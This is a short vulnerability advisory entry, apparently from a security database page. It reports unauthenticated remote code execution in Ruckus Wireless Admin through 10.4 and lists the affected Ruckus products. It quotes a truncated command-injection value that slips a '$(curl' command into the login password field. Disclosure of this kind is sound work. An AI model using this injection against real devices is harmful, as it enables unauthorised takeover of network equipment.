Ruckus Wireless Admin up to and including 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
ruckuswireless ruckus_wireless_admin |
||
ruckuswireless smartzone_ap |
||
ruckuswireless smartzone |
||
ruckuswireless smartzone 6.1.0.0.935 |